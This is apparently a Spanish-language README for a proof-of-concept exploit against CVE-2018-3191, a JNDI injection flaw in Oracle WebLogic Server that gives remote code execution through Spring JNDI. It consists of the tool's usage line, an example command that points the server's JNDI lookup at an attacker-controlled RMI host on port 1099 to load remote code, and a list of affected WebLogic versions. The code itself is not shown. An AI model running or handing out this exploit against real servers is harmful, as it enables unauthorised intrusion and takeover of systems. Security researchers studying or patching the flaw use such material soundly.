
Prueba de concepto del exploit para CVE-2018-3191 dirigido a WebLogic Server mediante inyección JNDI. Entrega un payload JAR para desencadenar la ejecución remota de código a través de Spring JNDI.
Uso:
java -jar weblogic-spring-jndi.jar <jndi_address>
Ejemplo:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
Nota:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1